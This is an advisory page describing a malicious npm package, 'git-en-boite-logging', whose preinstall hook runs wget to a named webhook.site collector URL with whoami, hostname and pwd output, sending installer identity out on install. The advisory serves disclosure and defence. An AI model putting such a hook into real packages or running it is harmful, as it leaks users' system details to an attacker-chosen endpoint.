VDB

GCVE-110-OSM-2026-12691

GCVE-110-OSM-2026-12691
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published September 28, 2026
package.json declares a preinstall lifecycle hook that runs `wget` to a hardcoded webhook.site collector URL (https://webhook.site/3fcfa5af-1b4e-4556-9d48-26190d02795f/), passing `$(whoami)`, `$(hostname)`, and `$(pwd)` as query parameters. On `npm install`, npm invokes the preinstall script automatically, so the installer's OS username, host name, and current working directory are transmitted to an anonymous third-party webhook collector without any user action. This is the canonical dependency-confusion / reconnaissance beacon shape: an otherwise-empty package whose only on-install effect is to phone home installer identity to an attacker-chosen endpoint, typically used to confirm ingress into a target's internal build environment before staging a follow-on payload. ENTRY index.js (main: index.js) - Preinstall Script in package.json: ""preinstall": "wget --quiet \"" DESTINATION - 1 exfil (webhookServices) (values recorded in verified_iocs) EXFIL - OAST/Interactsh Exfiltration in package.json: "webhook.site"

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknowngit-en-boite-loggingall (affected)—

References

advisory
vendor

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›